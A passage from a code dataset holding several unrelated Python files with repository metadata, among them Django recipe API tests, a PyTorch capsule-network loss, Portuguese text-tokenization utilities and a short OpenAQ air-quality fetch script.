user user can retrieve his own recipe detail views.\"\"\"\n other_user = get_user_model().objects.create_user(\n 'other@gmail.com', 'password123'\n )\n recipe = Recipe.objects.create(\n title='Recipe 1', user=other_user, time_minutes=6, price=4.00\n )\n\n url = get_recipe_detail_url(recipe.id)\n res = self.client.get(url)\n\n self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_recipe_create_success(self):\n \"\"\"Test creating a new recipe.\"\"\"\n payload = {'title': 'New Recipe', 'time_minutes': 5, 'price': 3.33}\n\n res = self.client.post(RECIPES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n self.assertTrue(Recipe.objects.filter(title=payload['title']).exists())\n\n def test_recipe_with_tags_create_success(self):\n \"\"\"Test creating a new recipe with tags.\"\"\"\n tag_1 = Tag.objects.create(user=self.user, name='tag 1')\n tag_2 = Tag.objects.create(user=self.user, name='tag 2')\n payload = {\n 'title': 'New Recipe',\n 'time_minutes': 5,\n 'price': 3.33,\n 'tags': [tag_1.id, tag_2.id],\n }\n\n res = self.client.post(RECIPES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(title=payload['title'])\n tags = recipe.tags.all()\n self.assertIn(tag_1, tags)\n self.assertIn(tag_2, tags)\n\n def test_recipe_with_ingredients_create_success(self):\n \"\"\"Test creating a new recipe with ingredients.\"\"\"\n ingredient_1 = Ingredient.objects.create(user=self.user, name='Ingredient 1')\n ingredient_2 = Ingredient.objects.create(user=self.user, name='Ingredient 2')\n payload = {\n 'title': 'New Recipe',\n 'time_minutes': 5,\n 'price': 3.33,\n 'ingredients': [ingredient_1.id, ingredient_2.id],\n }\n\n res = self.client.post(RECIPES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(title=payload['title'])\n ingredients = recipe.ingredients.all()\n self.assertIn(ingredient_1, ingredients)\n self.assertIn(ingredient_2, ingredients)\n\n def test_partial_update_recipe(self):\n \"\"\"Test HTTP PATCH is possible on existing recipe objects.\"\"\"\n recipe = Recipe.objects.create(\n user=self.user, title='Chickenn', time_minutes=5, price=10.00\n )\n tag = Tag.objects.create(user=self.user, name='Tag')\n payload = {\n 'title': 'Chicken with vegetables',\n 'tags': [tag.id],\n }\n\n url = get_recipe_detail_url(recipe.id)\n res = self.client.patch(url, payload)\n\n recipe.refresh_from_db()\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertIn(tag, recipe.tags.all())\n self.assertEqual(recipe.title, payload['title'])\n\n def test_full_update_recipe(self):\n \"\"\"Test HTTP PUT is possible on existing recipe objects.\"\"\"\n recipe = Recipe.objects.create(\n user=self.user, title='Chickenn', time_minutes=5, price=10.00\n )\n tag = Tag.objects.create(user=self.user, name='Tag')\n recipe.tags.add(tag)\n payload = {\n 'title': 'Chicken with vegetables',\n 'time_minutes': 1,\n 'price': 69.00,\n }\n\n url = get_recipe_detail_url(recipe.id)\n res = self.client.put(url, payload)\n\n recipe.refresh_from_db()\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertNotIn(tag, recipe.tags.all())\n self.assertEqual(recipe.title, payload['title'])\n\n\nclass RecipeImageUploadTests(TestCase):\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n 'test@gmail.com',\n 'testpass',\n )\n self.client.force_authenticate(self.user)\n self.recipe = Recipe.objects.create(\n user=self.user, title='Sample', time_minutes=1, price=1.0\n )\n\n def test_upload_image_to_recipe(self):\n \"\"\"test uploading image to recipe.\"\"\"\n url = get_image_upload_url(self.recipe.id)\n with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:\n img = Image.new('RGB', (10, 10))\n img.save(ntf, format='JPEG')\n ntf.seek(0)\n res = self.client.post(url, {'image': ntf}, format='multipart')\n\n self.recipe.refresh_from_db()\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertIn('image', res.data)\n self.assertTrue(os.path.exists(self.recipe.image.path))\n\n def test_upload_image_bad_request(self):\n \"\"\"Test uploading an invalid image.\"\"\"\n url = get_image_upload_url(self.recipe.id)\n\n res = self.client.post(url, {'image': 'notimage'}, format='multipart')\n\n self.recipe.refresh_from_db()\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertFalse(self.recipe.image)\n\n def test_filter_tags_success(self):\n \"\"\"Test filtering recipes by tags.\"\"\"\n recipe_1 = Recipe.objects.create(\n user=self.user, title='Dish 1', time_minutes=1, price=1.11\n )\n recipe_2 = Recipe.objects.create(\n user=self.user, title='Dish 2', time_minutes=2, price=2.22\n )\n recipe_3 = Recipe.objects.create(\n user=self.user, title='Dish 3', time_minutes=3, price=3.33\n )\n tag_1 = Tag.objects.create(user=self.user, name='Tag 1')\n tag_2 = Tag.objects.create(user=self.user, name='Tag 2')\n recipe_1.tags.add(tag_1)\n recipe_2.tags.add(tag_2)\n\n res = self.client.get(RECIPES_URL, {'tags': f'{tag_1.id},{tag_2.id}'})\n\n self.assertIn(RecipeSerializer(recipe_1).data, res.data)\n self.assertIn(RecipeSerializer(recipe_2).data, res.data)\n self.assertNotIn(RecipeSerializer(recipe_3).data, res.data)\n\n def test_filter_ingredients_success(self):\n \"\"\"Test filtering ingredients by tags.\"\"\"\n recipe_1 = Recipe.objects.create(\n user=self.user, title='Dish 1', time_minutes=1, price=1.11\n )\n recipe_2 = Recipe.objects.create(\n user=self.user, title='Dish 2', time_minutes=2, price=2.22\n )\n recipe_3 = Recipe.objects.create(\n user=self.user, title='Dish 3', time_minutes=3, price=3.33\n )\n ingredient_1 = Ingredient.objects.create(user=self.user, name='ingredient 1')\n ingredient_2 = Ingredient.objects.create(user=self.user, name='ingredient 2')\n recipe_1.ingredients.add(ingredient_1)\n recipe_2.ingredients.add(ingredient_2)\n\n res = self.client.get(\n RECIPES_URL, {'ingredients': f'{ingredient_1.id},{ingredient_2.id}'}\n )\n\n self.assertIn(RecipeSerializer(recipe_1).data, res.data)\n self.assertIn(RecipeSerializer(recipe_2).data, res.data)\n self.assertNotIn(RecipeSerializer(recipe_3).data, res.data)\n\n def tearDown(self):\n self.recipe.image.delete()\n","repo_name":"mkwiatek770/REST-API-Advanced","sub_path":"app/recipe/tests/test_recipe_api.py","file_name":"test_recipe_api.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32383913392","text":"# import jax.numpy as jnp\nimport numpy as np\nimport enseisro.misc_functions as FN\nfrom enseisro import globalvars\n\ndef get_eig(GVAR, mode_idx):\n try:\n U = np.loadtxt(f'{GVAR.eigdir}/' +\n f'U{mode_idx}.dat')[GVAR.rmin_idx:GVAR.rmax_idx]\n V = np.loadtxt(f'{GVAR.eigdir}/' +\n f'V{mode_idx}.dat')[GVAR.rmin_idx:GVAR.rmax_idx]\n except FileNotFoundError:\n LOGGER.info('Mode file not found for mode index = {}'\\\n .format(mode_idx))\n return None\n return U, V\n","repo_name":"srijaniiserprinceton/enseisro","sub_path":"enseisro/loading_functions.py","file_name":"loading_functions.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40575509465","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass CapsNetLoss(nn.Module):\n\n def __init__(self, w_recon=0.0005):\n super(CapsNetLoss, self).__init__()\n\n self.cls_loss_func = MarginLoss()\n self.reconstruction_loss_func = nn.MSELoss(reduction='sum')\n self.w_recon = w_recon\n\n def forward(self, probability, target, reconstruction=None, image=None):\n \n total_loss = self.cls_loss_func(probability, target)\n\n if (reconstruction is not None) and (image is not None):\n batch_size = image.shape[0]\n reconstruction_loss = self.reconstruction_loss_func(reconstruction, image.reshape(batch_size, -1))\n reconstruction_loss = reconstruction_loss / float(batch_size)\n total_loss = total_loss + self.w_recon * reconstruction_loss\n\n return total_loss\n\n\nclass MarginLoss(nn.Module):\n\n def __init__(self, m_pos=0.9, m_neg=0.1, w_neg=0.5, onehot=False):\n super(MarginLoss, self).__init__()\n\n self.m_pos = m_pos\n self.m_neg = m_neg\n self.w_neg = w_neg\n self.onehot = onehot\n\n def forward(self, input, target):\n\n target_onehot = target.float() if self.onehot else torch.zeros(input.shape, device=target.device).scatter_(1, target.unsqueeze(dim=1), 1)\n\n pos_term = (self.m_pos - input).relu_() ** 2\n neg_term = (input - self.m_neg).relu_() ** 2\n\n loss = target_onehot * pos_term + self.w_neg * (1.0 - target_onehot) * neg_term\n loss = loss.mean()\n\n return loss","repo_name":"Minglin-Chen/Capsule-Network-in-PyTorch","sub_path":"criterion/CapsNetLoss.py","file_name":"CapsNetLoss.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"44100523058","text":"#!/usr/bin/env python3\n\nfrom subprocess import Popen, PIPE, call\n\nEXECUTABLE = \"./test\"\n\nprint(r'''\n---------\\\nBuilding |\n---------/\n''')\ncall(['make','release'])\n\nprint(r'''\n---------\\\nRunning |\n---------/\n''')\n\n\nclass Result:\n def __init__(self, name, data):\n self._name = name\n self._data= {k:list(map(int,v)) for k,*v in data}\n\n def printTable(self):\n print(self._name)\n JUST = 10\n labels = [\"\", \"min\", \"max\", \"med\", \"rel. stddev\"]\n lines = []\n lines.append([JUST*\"_\"]*len(labels))\n lines.append(labels)\n for k,v in self._data.items():\n lines.append([JUST*\"-\"]*len(labels))\n medVal = sum(v)/len(v)\n relStddev = sum(map(lambda x: (x-medVal)**2, v))**0.5 / medVal\n lines.append([k, min(v), max(v), round(medVal,1), round(relStddev,4)])\n for l in lines:\n print('|'.join(map(lambda x: str(x).rjust(JUST), l)))\n print()\n\n\n def __str__(self):\n ret = self._name + '\\n\\t'\n ret += '\\n\\t'.join(map(str,self._data.items()))\n return ret\n\np = Popen([EXECUTABLE], stdin=PIPE, stdout=PIPE, stderr=PIPE)\nout = p.communicate()[0].decode().split('\\n')\nout = list(map(lambda x: [i.strip() for i in x.split() if i.strip()], out))\nout = [o for o in out if o]\n\nprint('\\n'.join(map(str,out)))\n\nresults = []\ni = 0\nwhile i < len(out):\n name = out[i][0]\n count = int(out[i][1])\n i += 1\n data=out[i:i+count]\n i += count\n results.append(Result(name,data))\n\nprint(r'''\n------------\\\nResults rav |\n------------/\n''')\n\nprint('\\n'.join(map(str,results)))\n\nprint(r'''\n--------------\\\nResults tables|\n--------------/\n''')\n\nfor r in results:\n r.printTable()\n\n# print(r'''\n# ---------\\\n# Clearing |\n# ---------/\n# ''')\n# call(['make','clean'])\n","repo_name":"msypetkowski/x86_StringTest","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7955493468","text":"\n\nfrom lib.display import Display\nfrom lib.multiplexer import Multiplexer\nfrom lib.draw_utils import draw_centered_text, get_font, get_max_font, draw_check_mark, draw_chevron, draw_block\nimport textwrap\nimport math\nfrom display_manager import DisplayManager\n\nclass GameView:\n def __init__(self, config): \n self.config = config\n self.font, self.wrapped, self.max_len = self.get_font_and_wrapped()\n\n def draw_task(self):\n def draw_function(draw, device):\n font = get_font(22)\n draw_centered_text(device, draw, font, \"Schätze\", 2)\n draw_centered_text(device, draw, font, \"die Daten\", 30)\n\n DisplayManager.instance().main_display.draw(draw_function)\n\n def get_font_and_wrapped(self):\n # get longest label\n max_len_total = len(max([field[\"label\"]for field in self.config[\"data\"]], key=len))\n max_len_row = 0\n wrapped = []\n for i, field in enumerate(self.config[\"data\"]):\n rows = textwrap.wrap(field[\"label\"], max_len_total//2.5, break_long_words=False)\n max_len_row = max(max_len_row, len(max(rows, key=len)))\n wrapped.append(rows)\n\n return get_max_font(DisplayManager.instance().main_display.device.width, max_len_row), wrapped, max_len_row\n\n def draw_label(self, index):\n def draw_function(draw, device):\n label_rows = self.wrapped[index]\n h = draw.textsize(\"Xg\", font=self.font)[1]\n baseline = len(label_rows) * -0.5 * h\n for i, row in enumerate(label_rows):\n y = device.height / 2 + baseline + i * h \n draw_centered_text(device, draw, self.font, row, y)\n DisplayManager.instance().displays[index].draw(draw_function)\n \n def cleanup(self): \n pass \n","repo_name":"schachdavid/constructive-bar-chart","sub_path":"data-physicalization/screens/game/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72140109607","text":"from rest_framework.pagination import PageNumberPagination\nfrom collections import OrderedDict\nfrom rest_framework.views import Response\nclass Mypageination(PageNumberPagination):\n page_size = 10 #默认每页显示多少条\n page_query_param = 'page_num' #指定查询的第几页 页码 默认page\n page_size_query_param = 'page_size' #指定每条显示多少条\n max_page_size = 50 #每页最多显示多少条\n def get_paginated_response(self, data):\n code = 200\n msg = '成功'\n if not data:\n code = 404\n msg = '没有发现数据'\n return Response(OrderedDict([\n ('code',code),\n ('message',msg),\n ('count', self.page.paginator.count),\n # ('next', self.get_next_link()),\n # ('previous', self.get_previous_link()),\n ('data', data)\n ]))\n","repo_name":"lrange2001/ftest","sub_path":"ftest/server/other/ftestPageNumberPagination.py","file_name":"ftestPageNumberPagination.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19840255031","text":"#!/usr/bin/env python\n__author__ = 'jesse'\n''' give this a set of np_observations\n\n outputs synsets and observation pairing attempting to reconstruct original wnid_graph based on observations alone\n\n'''\n\nimport argparse\nimport pickle\nfrom gap_statistic_functions import *\n\n\ndef main():\n\n # read in pre-calculated information\n f = open(FLAGS_params_infile, 'rb')\n clusters, means, syn_idx, syn_jdx = pickle.load(f)\n f.close()\n\n # do the grunt work\n set_x = clusters[syn_idx]\n set_x = numpy.concatenate((set_x, clusters[syn_jdx][:]), 0)\n ref_sets = get_reference_sets(set_x)\n ks = [1, 2]\n mu_k1 = reevaluate_centers({0: set_x}, len(set_x[0]))\n mu_k2 = [means[syn_idx], means[syn_jdx]]\n clusters_k1 = {0: set_x}\n clusters_k2 = {0: clusters[syn_idx], 1: clusters[syn_jdx]}\n w_k1 = numpy.log(wk(mu_k1, clusters_k1))\n w_k2 = numpy.log(wk(mu_k2, clusters_k2))\n merge, gap, _ = gap_statistic(ks, [w_k1, w_k2], ref_sets)\n\n # write merge value and calculated gap to pickle\n f = open(FLAGS_outfile, 'wb')\n d = [merge, gap]\n pickle.dump(d, f)\n f.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--params_infile', type=str, required=True,\n help=\"parameters to pass to gap_statistic\")\n parser.add_argument('--outfile', type=str, required=True,\n help=\"output pickled return values of gap_statistic\")\n args = parser.parse_args()\n for k, v in vars(args).items():\n globals()['FLAGS_%s' % k] = v\n main()\n","repo_name":"thomason-jesse/synpol","sub_path":"run_gap_statistic.py","file_name":"run_gap_statistic.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40727604758","text":"import fileinput\n\nnums = []\nfor line in fileinput.input():\n\tnums.append(int(line))\n\ndef solve_part1():\n\ti = 25\n\twhile i < len(nums):\n\t\tn = nums[i]\n\t\tfound = False\n\t\tfor x in range(1, 26):\n\t\t\tfor y in range(1, 26):\n\t\t\t\tif x != y and nums[i - x] + nums[i - y] == n:\n\t\t\t\t\tfound = True\n\t\t\t\t\tbreak\n\t\tif not found:\n\t\t\treturn nums[i]\n\t\ti += 1\n\t\ndef solve_part2(find):\n\ti = len(nums) - 1\n\twhile i > 0:\n\t\tk = i\n\t\tcount = 0\n\t\twhile k > 0 and count < find:\n\t\t\tcount += nums[k]\n\t\t\tk -= 1\n\t\tif k != i - 1 and count == find:\n\t\t\tweak = []\n\t\t\tk += 1\n\t\t\twhile k <= i:\n\t\t\t\tweak.append(nums[k])\n\t\t\t\tk += 1\n\t\t\tweak.sort()\n\t\t\treturn (weak[0] + weak[-1])\n\t\ti -= 1\n\npart1 = solve_part1()\nprint(part1)\npart2 = solve_part2(part1)\nprint(part2)\n","repo_name":"rpehkone/adventofcode","sub_path":"2020/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41416521758","text":"from django.http import HttpResponse\n\nfrom TestModel.models import Test\n\n# def testdb(request):\n# test1 = Test(name='runoob')\n# test1.save()\n# return HttpResponse(\"

数据添加成功!

\")\n\n# 数据库操作\ndef testdb(request):\n # 初始化\n response1 = \"\"\n response2 = \"\"\n\n # 通过objects这个模型管理器的all()获得所有数据行,相当于SQL中的SELECT * FROM\n list1 = Test.objects.all()\n\n # filter相当于SQL中的WHERE,可设置条件过滤结果\n list2 = Test.objects.filter(id=1)\n\n # 获取单个对象\n list3 = Test.objects.get(id=1)\n # 限制返回的数据 相当于 SQL 中的 OFFSET 0 LIMIT 2;\n Test.objects.order_by('name')[0:2]\n\n #数据排序\n Test.objects.order_by(\"id\")\n\n # 上面的方法可以连锁使用\n Test.objects.filter(name=\"runoob\").order_by(\"id\")\n test1 = Test.objects.get(id=1)\n test1.name = 'Google'\n test1.save()\n\n # 输出所有数据\n for var in list1:\n response1 += var.name + \" \"\n for var in list2:\n response2 += var.name + \" \"\n response3 = list3.name\n return HttpResponse(\"

\" + response1 + \"

\" + '\\n' +\n \"

\" + response2 + \"

\" + '\\n' +\n \"

\" + response3 + \"

\" + '\\n' +\n \"

\" + str(list3.__class__) + '\\n' +\n \"

\" + str(type(list3)) + \"

\" + '\\n' +\n \"

\" + test1.name + \"

\" + '\\n'\n )","repo_name":"dashanthony/Django","sub_path":"Django/testdb.py","file_name":"testdb.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11624828213","text":"# -*- coding: utf-8 -*-\n\nimport spacy\nimport urllib\nimport re\nimport math\nfrom gensim.corpora import Dictionary\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nimport random as rd\nimport codecs\nimport nltk.data\nfrom multiprocessing import Process, Lock\nimport copy\n\nnlp = spacy.load(\"pt_core_news_sm\")\nrd.seed(4321)\n\ndef read_xml(xml_file_location, abbreviations=None):\n tokenizer = nltk.data.load('tokenizers/punkt/portuguese.pickle')\n tree = ET.parse(xml_file_location)\n root = tree.getroot()\n soup = None\n docs = []\n if abbreviations != None:\n for item in abbreviations:\n tokenizer._params.abbrev_types.add(item)\n\n for paragraph in root.iter('Texto'):\n #print(paragraph.text)\n soup = BeautifulSoup(paragraph.text, 'html.parser')\n for p in soup.select('p'):\n texto = p.text.replace('\\r', ' ').replace('\\n', ' ').strip()\n if len(texto) > 0:\n doc = tokenizer.tokenize(texto.lower())\n docs.extend(doc)\n return docs\n\ndef read_html(file_location, abbreviations=None):\n tokenizer = nltk.data.load('tokenizers/punkt/portuguese.pickle')\n docs = []\n if abbreviations != None:\n for item in abbreviations:\n tokenizer._params.abbrev_types.add(item)\n\n with codecs.open(file_location, 'r', 'utf-8') as f:\n content = f.read()\n soup = BeautifulSoup(content, features = 'lxml')\n paragraphs = soup.find_all('p')\n for p in paragraphs:\n texto = p.text.replace(\"\\r\", '').replace(\"\\n\", ' ').strip().lower()\n if len(texto) > 0:\n doc = tokenizer.tokenize(texto)\n docs.extend(doc)\n return docs\n\ndef tokenizer_sentence(text, spacy_model=None, lemm_alternatives=None, exeption_lst=['ADJ', 'PROPN', 'NOUN'], insert_val_mask=True, debug=False):\n last_viewed = None\n text_split = re.split(r'(\\W+)', text)\n #text_split = re.sub(r'\\W+', ' ', text)\n if spacy_model == None:\n nlp = spacy.load(\"pt_core_news_sm\")\n else:\n nlp = spacy_model\n \n model = nlp(' '.join(text_split).strip())\n #model = nlp(text_split.strip())\n tokens = []\n new_tokens = []\n count = 0\n for word in model:\n str_word = str(word.text).lower().strip()\n if str_word != last_viewed:\n if count > 0:\n tokens += new_tokens + ['##SEQT']\n elif last_viewed != None:\n tokens += new_tokens\n \n new_tokens = []\n last_viewed = str_word\n count = 0\n \n num = True\n len_word = 0\n \n if lemm_alternatives and str_word in lemm_alternatives:\n str_lemma = lemm_alternatives[str_word].lower()\n else:\n str_lemma = str(word.lemma_).lower().strip()\n \n try:\n int(str_word)\n except:\n num = False\n\n if num:\n new_tokens.append('##NUM')\n if insert_val_mask:\n new_tokens.append(str_word)\n if debug:\n print(str_word)\n print(f'num: {word.pos_}')\n elif word.pos_ == 'NUM':\n new_tokens.append('##NUMEXT')\n if insert_val_mask:\n new_tokens.append(str_word)\n if debug:\n print(str_word)\n print(f'num: {word.pos_}')\n elif word.pos_ in exeption_lst:\n if debug:\n print(str_word)\n print(f'in exeption list: {word.pos_}')\n tokens.append(str_word)\n elif len(str_word) > 0 and str_word == str_lemma:\n new_tokens.append(str_word)\n else:\n #lemma\n i = 0\n \n if len(str_lemma) < len(str_word):\n len_word = len(str_lemma)\n else:\n len_word = len(str_word)\n\n while i < len_word and str_word[i] == str_lemma[i]:\n i += 1\n #print(str_word, str_lemma)\n if i == 0 and len(str_word) > 0:\n new_tokens.append(str_word) \n new_tokens.append('##' + str_lemma)\n elif len(str_word[:i].strip()) > 0:\n new_tokens.append(str_word[:i].strip())\n\n if i != 0 and len(str_word[i:].strip()) > 0:\n new_tokens.append('##' + str_word[i:].strip())\n\n if debug:\n print(i)\n print(str_word)\n print(str_lemma[0:i], str_lemma[i:])\n print(word.pos_)\n else:\n count += 1\n \n return tokens + new_tokens\n\n# Lock at the dictionary and make a deep copy\ndef pack_tokens(tokens, dictionary, lock, max_length = 512):\n nr_sep = math.ceil(len(tokens)/max_length)\n max_length_sep = max_length - nr_sep\n blks = math.ceil(len(tokens)/max_length_sep)\n blocks = []\n dict_copy = None\n \n lock.acquire()\n try:\n dictionary.add_documents([tokens])\n dict_copy = copy.deepcopy(dictionary)\n finally:\n lock.release()\n\n dict_in = []\n dict_out = []\n for i in range(blks):\n size_res = 0\n mask = [1] * max_length\n offset = max_length_sep*i\n #print(len(tokens[offset:(max_length_sep + offset)]))\n res = [\"[CLS]\"] + tokens[offset:(max_length_sep + offset)] + [\"[SEP]\"]\n size_res = len(res)\n if size_res < max_length:\n for i in range(size_res, max_length):\n mask[i] = 0\n res.append('[PAD]')\n #print(len(res))\n pos_mask, data_mask = mask_block(res, dict_copy)\n for it in data_mask:\n dict_in.append(dict_copy.token2id[it])\n \n for it in res:\n dict_out.append(dict_copy.token2id[it])\n \n blocks.append((size_res, pos_mask, data_mask, res, dict_in, dict_out, mask))\n return blocks\n\ndef mask_block(block, dictionary=None):\n prob = rd.random()\n if prob <= 0.1:\n return -1, block\n else:\n mask_pos = rd.randint(1, block.index(\"[SEP]\"))\n #print(mask_pos)\n if block[mask_pos] not in [\"[CLS]\", \"[SEP]\", \"[PAD]\"]:\n if prob <= 0.2:\n if dictionary == None:\n mask_pos2 = rd.randint(1, block.index(\"[SEP]\")-1)\n if mask_pos2 != mask_pos:\n return mask_pos, block[0:mask_pos] + block[mask_pos2] + block[mask_pos+1:]\n else:\n return mask_pos, block[0:mask_pos] + block[mask_pos2+1] + block[mask_pos+1:]\n else:\n mask_pos2 = rd.randint(4, len(dictionary)-1)\n if dictionary.token2id[block[mask_pos]] != mask_pos2:\n return mask_pos, block[0:mask_pos] + [dictionary[mask_pos2]] + block[mask_pos+1:]\n else:\n return mask_pos, block[0:mask_pos] + [dictionary[mask_pos2+1]] + block[mask_pos+1:]\n else:\n return mask_pos, block[0:mask_pos] + ['[MASK]'] + block[mask_pos+1:]\n return mask_pos, block","repo_name":"gvanerven/dou_transformer","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38276960895","text":"from jaratoolbox import celldatabase\n\nsubject = 'pinp007'\nexperiments = []\n\n# rd = cellDB.Experiment('pinp007', '2015-11-18', 'nick', 'more_sounds_tuning')\nexp0 = celldatabase.Experiment(subject, '2015-11-18')\nexperiments.append(exp0)\n\n# site1 = rd.add_site(depth = 3100, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3100, tetrodes=[3, 4, 5, 6])\nexp0.add_session('16-56-20', None, 'NoiseBurst', 'more_sounds_tuning') #Amplitude at 0.02, onset and offset responses on TT4\nexp0.add_session('16-59-10', None, 'LaserPulse', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW - Responds but is then inhibited, TT4\nexp0.add_session('17-02-10', None, 'LaserTrain', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW -\nexp0.add_session('17-07-37', 'a', 'AM', 'more_sounds_tuning') # Cool offset responses\n\n# site2 = rd.add_site(depth = 3300, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3300, tetrodes=[3, 4, 5, 6])\nexp0.add_session('17-52-33', None, 'NoiseBurst', 'more_sounds_tuning') #Amplitude at 0.02,\nexp0.add_session('17-55-32', None, 'LaserPulse', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW - Fast response and then inhibited\nexp0.add_session('17-58-23', None, 'LaserPulse', 'laser_tuning_curve') #Paradigm=laser_tuning_curve, 1mW -\nexp0.add_session('18-02-53', 'b', 'AM', 'more_sounds_tuning') #\n\n# site3 = rd.add_site(depth = 3463, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3463, tetrodes=[3, 4, 5, 6])\nexp0.add_session('18-37-51', None, 'NoiseBurst', 'more_sounds_tuning') #Amplitude at 0.02,\nexp0.add_session('18-40-23', None, 'LaserPulse', 'more_sounds_tuning')\nexp0.add_session('18-42-33', None, 'LaserTrain', 'more_sounds_tuning')\nexp0.add_session('18-49-14', 'c', 'AM', 'more_sounds_tuning') #\n\n# site4 = rd.add_site(depth = 3582, tetrodes = [3, 4, 5, 6])\n\nexp0.add_site(3582, tetrodes=[3, 4, 5, 6])\nexp0.add_session('19-15-56', None, 'NoiseBurst', 'more_sounds_tuning') #Still mostly on and offset resp.\nexp0.add_session('19-20-01', None, 'LaserPulse', 'more_sounds_tuning')\nexp0.add_session('19-23-55', None, 'LaserTrain', 'more_sounds_tuning')\nexp0.add_session('19-28-25', 'd', 'AM', 'more_sounds_tuning')\n\nexp1 = celldatabase.Experiment(subject, '2015-12-02')\nexperiments.append(exp1)\n\n#The threshold at this site is higher, hopefully leads to better clustering for tt4\n# site2 = rd.add_site(depth = 3150, tetrodes = [4])\n\nexp1.add_site(3150, tetrodes=[4])\nexp1.add_session('14-45-15', None, 'NoiseBurst', 'am_tuning_curve') #\nexp1.add_session('14-47-43', None, 'LaserPulse', 'am_tuning_curve') # 0.2mW\nexp1.add_session('14-50-11', None, 'LaserPulse2', 'am_tuning_curve') # 1mW\nexp1.add_session('14-52-44', None, 'LaserTrain', 'am_tuning_curve') # 1mW\nexp1.add_session('14-56-18', 'b', 'AM', 'am_tuning_curve') #\n\n# site3 = rd.add_site(depth = 3250, tetrodes = [4])\n\nexp1.add_site(3250, tetrodes=[4])\nexp1.add_session('15-24-42', None, 'NoiseBurst', 'am_tuning_curve') #\nexp1.add_session('15-27-29', None, 'LaserPulse', 'am_tuning_curve') #1mW\nexp1.add_session('15-29-37', None, 'LaserTrain', 'am_tuning_curve') #1mW\nexp1.add_session('15-32-33', 'c', 'AM', 'am_tuning_curve') #\nexp1.add_session('15-57-23', 'd', 'TuningCurve', 'am_tuning_curve') #\n\n# site4 = rd.add_site(depth = 3431, tetrodes = [4])\n\nexp1.add_site(3431, tetrodes=[4])\nexp1.add_session('16-15-45', None, 'NoiseBurst', 'am_tuning_curve') # Thresholds at 39mV\nexp1.add_session('16-18-34', 'lpa', 'LaserPulse', 'am_tuning_curve') # 1mW\nexp1.add_session('16-21-13', 'lta', 'LaserTrain', 'am_tuning_curve') # 1mW\nexp1.add_session('16-24-14', 'e', 'AM', 'am_tuning_curve') # 1mW\nexp1.add_session('16-50-17', 'f', 'TuningCurve', 'am_tuning_curve') # 1mW\n\n# site5 = rd.add_site(depth = 3554, tetrodes = [4, 6])\n\nexp1.add_site(3554, tetrodes=[4, 6])\nexp1.add_session('17-03-37', None, 'NoiseBurst', 'am_tuning_curve') # Thresholds at 42mV\nexp1.add_session('17-05-59', None, 'LaserPulse', 'am_tuning_curve') # 1mW\nexp1.add_session('17-08-15', None, 'LaserTrain', 'am_tuning_curve') # 1mW\nexp1.add_session('17-11-32', 'g', 'AM', 'am_tuning_curve') # 1mW\nexp1.add_session('17-37-55', 'h', 'TuningCurve', 'am_tuning_curve') # 1mW\n\n","repo_name":"sjara/jaratest","sub_path":"nick/inforecordings/thalamus/pinp007_inforec.py","file_name":"pinp007_inforec.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70416287527","text":"import requests\nimport csv\nimport os\n\n# set API key from OpenAQ as your env variable\nenv_var = os.getenv(\"API_VAR\")\nAPI_KEY = env_var\napi_call=\"https://api.openaq.org/v2/measurements?location_id=6386¶meter=o3¶meter=so2¶meter=no2¶meter=pm25¶meter=pm10&date_from=2023-07-01T02:00:00+02:00&date_to=2023-07-31T02:00:00+02:00&limit=3\"\n\nres = requests.get(api_call, headers={\"X-API-Key\": API_KEY})\nresults = res.json()['results']\n\nwith open(\"csv/wokalna.csv\", \"w\") as f:\n w = csv.DictWriter(f, results[0].keys())\n w.writeheader()\n 